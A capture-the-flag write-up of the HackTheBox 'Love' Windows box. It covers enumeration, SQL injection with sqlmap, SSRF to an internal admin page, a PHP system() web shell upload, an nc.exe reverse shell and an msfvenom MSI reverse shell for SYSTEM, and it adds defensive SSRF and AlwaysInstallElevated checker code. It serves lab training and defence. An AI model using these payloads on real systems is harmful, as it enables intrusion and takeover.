Love Writeup - HackTheBox

Pedro Mariano
3 min

Welcome to the writeup of the Love box from HackTheBox. This is an easy Windows machine where we explore an SSRF vulnerability and then abuse two registry values to escalate privileges.

I hope you enjoy it!


NMAP

nmap -v -sSV -p 80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670 -Pn 10.10.10.239 -T4 -oA nmap/sSV

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Added 10.10.10.239 -> love.htb to /etc/hosts.


A web request on port 443 (love.htb:443) returns Bad Request (400), but the error page still reveals server information:

Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at www.example.com Port 443

GOBUSTER

gobuster dir -u http://love.htb/ -w /usr/share/wordlists/dirb/big.txt -e -s "200,301,302,401" -t 50
===============================================================
http://love.htb/.htaccess            (Status: 403) [Size: 298]
http://love.htb/.htpasswd            (Status: 403) [Size: 298]
http://love.htb/ADMIN                (Status: 301) [Size: 329] [--> http://love.htb/ADMIN/]
http://love.htb/Admin                (Status: 301) [Size: 329] [--> http://love.htb/Admin/]
http://love.htb/Images               (Status: 301) [Size: 330] [--> http://love.htb/Images/]
http://love.htb/admin                (Status: 301) [Size: 329] [--> http://love.htb/admin/] 
http://love.htb/aux                  (Status: 403) [Size: 298]                              
http://love.htb/cgi-bin/             (Status: 403) [Size: 298]                              
http://love.htb/com1                 (Status: 403) [Size: 298]                              
http://love.htb/com2                 (Status: 403) [Size: 298]                              
http://love.htb/com4                 (Status: 403) [Size: 298]                              
http://love.htb/com3                 (Status: 403) [Size: 298]                              
http://love.htb/con                  (Status: 403) [Size: 298]                              
http://love.htb/dist                 (Status: 301) [Size: 328] [--> http://love.htb/dist/]  
http://love.htb/examples             (Status: 503) [Size: 398]                              
http://love.htb/images               (Status: 301) [Size: 330] [--> http://love.htb/images/]
http://love.htb/includes             (Status: 301) [Size: 332] [--> http://love.htb/includes/]
http://love.htb/licenses             (Status: 403) [Size: 417]                                
http://love.htb/lpt2                 (Status: 403) [Size: 298]                                
http://love.htb/lpt1                 (Status: 403) [Size: 298]                                
http://love.htb/nul                  (Status: 403) [Size: 298]                                
http://love.htb/phpmyadmin           (Status: 403) [Size: 298]                                
http://love.htb/plugins              (Status: 301) [Size: 331] [--> http://love.htb/plugins/] 
http://love.htb/prn                  (Status: 403) [Size: 298]                                
http://love.htb/secci�               (Status: 403) [Size: 298]                                
http://love.htb/server-info          (Status: 403) [Size: 417]                                
http://love.htb/server-status        (Status: 403) [Size: 417]                                
http://love.htb/tcpdf                (Status: 301) [Size: 329] [--> http://love.htb/tcpdf/]   
http://love.htb/webalizer            (Status: 403) [Size: 298]

Searching for the application I found a public exploit. Capturing the request with Burp and passing it to sqlmap confirmed that the vulnerability was exploitable.

- Burp request was saved as "love".

sqlmap --dbms=mysql --batch --level=1 --risk=3 -r love -p voter

Working on it, I was able to dump a lot of data...

But I didn't get anything else this way... Did I miss something? Yes!

So let's go back to enumeration and run a new, more "aggressive" scan with NMAP.

NMAP #2

nmap -v -sC -A -p 80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670 -Pn -T4 -oA nmap/sCA 10.10.10.239
Nmap scan report for love.htb (10.10.10.239)
Host is up (0.11s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=**staging**.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Issuer: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-18T14:00:16
| Not valid after:  2022-01-18T14:00:16
| MD5:   bff0 1add 5048 afc8 b3cf 7140 6e68 5ff6
|_SHA-1: 83ed 29c4 70f6 4036 a6f4 2d4d 4cf6 18a2 e9e4 96c2
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '10.10.14.73' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden

[...]

Carefully checking the scan results for port 443 shows a possible subdomain in the TLS certificate: "staging". Added it to /etc/hosts as well.


Tried to access http://staging.love.htb/ and it is live.


It seems to be a service that analyses files/URLs to identify malicious content.

The "Demo" page (http://staging.love.htb/beta.php) lets you scan a file by URL, but it seems to be vulnerable to SSRF: I was able to "scan" a file hosted on my own machine, hmm...

Tried to reach some pages on the target host itself (http://10.10.10.239:80) through it, and it worked!

Tried http://127.0.0.1:80 and it gave me the same page as the previous request...

Looking at the ports that serve HTTP, port 5000 returned 403 Forbidden when visited directly. But what happens if the server itself requests it?

Visiting port 5000 from the server itself returns a different page, which contains admin credentials.
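The server-side fetch behind beta.php trusts whatever URL it is given, which is exactly what lets a request reach the box's own 127.0.0.1:5000. The following Python is an added example, not code from the box or from the Voting System application: the destination check a defender would put in front of such a fetch. It allowlists scheme and port, resolves the name, refuses any answer in loopback, private, link-local or other non-routable ranges, and pins the validated IP so the fetcher does not resolve the name a second time (DNS rebinding). `FAKE_DNS`, `scanme.example`, `fake_resolver` and the `resolver` parameter are constructed for offline use; `resolve_host` is what a real deployment would use.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Policy for a "scan this URL" feature: only plain web ports, only public hosts.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


class SsrfRejected(ValueError):
    """Raised when a user-supplied URL must not be fetched server-side."""


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses (v4 or v6)."""
    addr = ipaddress.ip_address(ip)
    return not (
        addr.is_private         # 10/8, 172.16/12, 192.168/16, fc00::/7, doc ranges ...
        or addr.is_loopback     # 127/8, ::1
        or addr.is_link_local   # 169.254/16 (cloud metadata lives here), fe80::/10
        or addr.is_multicast
        or addr.is_reserved
        or addr.is_unspecified  # 0.0.0.0, ::
    )


def resolve_host(host: str) -> list[str]:
    """Default resolver: every A/AAAA answer for the name (or the literal itself)."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def validate_scan_url(url: str, resolver=resolve_host) -> tuple[str, str, int]:
    """Return (host, pinned_ip, port) for a URL that is safe to fetch, else raise."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise SsrfRejected(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise SsrfRejected("credentials in URL are not allowed")
    host = parts.hostname
    if not host:
        raise SsrfRejected("URL has no host")
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError as exc:
        raise SsrfRejected("malformed port") from exc
    if port not in ALLOWED_PORTS:
        raise SsrfRejected(f"port not allowed: {port}")
    try:
        addrs = resolver(host)
    except OSError as exc:
        raise SsrfRejected(f"cannot resolve {host}") from exc
    if not addrs:
        raise SsrfRejected(f"no addresses for {host}")
    # Every answer must be public: a name with one public and one private
    # record would otherwise let the requester pick which one gets used.
    for ip in addrs:
        if not is_public_address(ip):
            raise SsrfRejected(f"{host} resolves to non-public address {ip}")
    # Pin the validated IP: the fetcher should connect to this address (with the
    # Host header set to `host`) rather than resolving the name again.
    return host, addrs[0], port


def scan_decision(url: str, resolver=resolve_host) -> str:
    """One-line verdict, handy for logging every server-side fetch attempt."""
    try:
        host, ip, port = validate_scan_url(url, resolver)
    except SsrfRejected as exc:
        return f"reject: {exc}"
    return f"allow: host={host} ip={ip} port={port}"


# Constructed name -> address table so the example runs offline.
FAKE_DNS = {
    "scanme.example": ["93.184.216.34"],   # constructed public host
    "staging.love.htb": ["10.10.10.239"],  # the box's own address, per the writeup
    "localhost": ["127.0.0.1"],
}


def fake_resolver(host: str) -> list[str]:
    """Constructed stand-in for resolve_host()."""
    try:
        ipaddress.ip_address(host)
        return [host]  # literal IP in the URL
    except ValueError:
        pass
    if host not in FAKE_DNS:
        raise OSError(f"NXDOMAIN {host}")
    return FAKE_DNS[host]


if __name__ == "__main__":
    for u in ("http://scanme.example/sample.bin",
              "http://10.10.10.239:80/",           # the writeup's first pivot
              "http://127.0.0.1:5000/",            # the internal admin page
              "http://staging.love.htb/beta.php",
              "gopher://scanme.example/",
              "http://user@scanme.example/"):
        print(f"{u:40} -> {scan_decision(u, fake_resolver)}")
```

Logging the verdict for every attempted fetch is the detection side: a burst of rejects naming 127.0.0.1 or the host's own address is exactly the probing described above.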


These credentials let me log in to the admin panel.


In Manage > Voters, when creating a "new user" it is possible to upload an image. The upload field has no filters at all, which gives RCE (Remote Code Execution). I created a "napo.php" file containing a system() payload and uploaded it to the server.

echo '<?php system($_GET["nap0"]); ?>' > napo.php

I then uploaded nc.exe and, through the RCE, used it to establish a reverse shell to port 8888: http://love.htb/Images/napo.php?nap0=nc%2010.10.14.88%208888%20-e%20cmd.exe.



As the user Phoebe it was possible to find the first flag in C:\Users\Phoebe\Desktop\user.txt.

Privilege Escalation

Looking for a way to escalate privileges, I transferred winPEASx64.exe to the host (using impacket-smbserver) and ran it to find a path to "evolve" our privilege.


Running WinPEAS, we found a point to abuse for privilege escalation.


The problem exists because the two registry values are enabled (value 1), which means that any user, whatever their privilege, can install .msi files as NT AUTHORITY\SYSTEM.
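The two values WinPEAS flags here are the Windows Installer "AlwaysInstallElevated" policy in HKLM and HKCU; that identification is mine, the writeup itself only says "two registers". The Python below is an added example, not part of the writeup or of WinPEAS: it parses the output of `reg query <key> /v AlwaysInstallElevated` for both hives, reports whether the combination is exploitable (both must be 1), and states the fix. The `SAMPLE_*` strings are constructed copies of what `reg query` prints; `collect_live()` only runs on a Windows host and is the piece an audit script would call.

```python
import platform
import re
import subprocess

# Registry locations of the Windows Installer "AlwaysInstallElevated" policy.
# Both must be REG_DWORD 1 for a per-user .msi install to run as SYSTEM.
INSTALLER_KEYS = {
    "HKLM": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer",
    "HKCU": r"HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer",
}
VALUE_NAME = "AlwaysInstallElevated"
VALUE_RE = re.compile(rf"^\s*{VALUE_NAME}\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$",
                      re.MULTILINE)


def parse_reg_query(output: str):
    """Value of AlwaysInstallElevated in `reg query` output, or None if absent."""
    m = VALUE_RE.search(output)
    return int(m.group(1), 16) if m else None


def assess(hklm_output: str, hkcu_output: str) -> dict:
    """Combine both hives into a finding; only 1 AND 1 is the exploitable state."""
    hklm = parse_reg_query(hklm_output)
    hkcu = parse_reg_query(hkcu_output)
    exposed = hklm == 1 and hkcu == 1
    return {
        "HKLM": hklm,
        "HKCU": hkcu,
        "exposed": exposed,
        "finding": ("AlwaysInstallElevated is 1 in both hives: any user can install "
                    "an .msi as NT AUTHORITY\\SYSTEM" if exposed
                    else "not exploitable: at least one hive is unset or 0"),
        "fix": ("set both values to 0 or remove them; via GPO: Computer/User "
                "Configuration > Administrative Templates > Windows Components > "
                "Windows Installer > Always install with elevated privileges = Disabled"),
    }


def collect_live() -> dict:
    """Query the real registry on a Windows host and assess it."""
    if platform.system() != "Windows":
        raise RuntimeError("collect_live() needs a Windows host")
    outputs = {}
    for hive, key in INSTALLER_KEYS.items():
        proc = subprocess.run(["reg", "query", key, "/v", VALUE_NAME],
                              capture_output=True, text=True)
        # When the value is absent, reg.exe exits non-zero and prints an
        # ERROR line on stderr; stdout is then empty, which parses as None.
        outputs[hive] = proc.stdout
    return assess(outputs["HKLM"], outputs["HKCU"])


# Constructed samples of what `reg query ... /v AlwaysInstallElevated` prints.
SAMPLE_HKLM_SET = (
    "\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n"
)
SAMPLE_HKCU_SET = (
    "\r\nHKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n"
)
SAMPLE_HKLM_ZERO = (
    "\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x0\r\n\r\n"
)
SAMPLE_ABSENT = ""  # stdout when the value does not exist

if __name__ == "__main__":
    for label, (a, b) in {"both set": (SAMPLE_HKLM_SET, SAMPLE_HKCU_SET),
                          "HKLM only": (SAMPLE_HKLM_SET, SAMPLE_ABSENT),
                          "HKLM 0": (SAMPLE_HKLM_ZERO, SAMPLE_HKCU_SET)}.items():
        r = assess(a, b)
        print(f"{label:10} HKLM={r['HKLM']} HKCU={r['HKCU']} -> {r['finding']}")
```

The same two values are what WinPEAS reports; the point of a standalone check is that it can run from a configuration-management or audit job so the state is fixed before anyone has to find it from a shell.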

I generated a reverse shell with msfvenom as an .msi file connecting back to port 8080, and used impacket-smbserver again to transfer the .msi file.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.164 LPORT=8080 -f msi -o rnap0.msi

After transferring it, I executed the payload file with msiexec and got a reverse shell as SYSTEM.

msiexec /quiet /qn /i rnap0.msi

With these privileges we have control of the box and can find the root flag.


Thanks for reading and feel free to pingback a coffee ;D

naP0

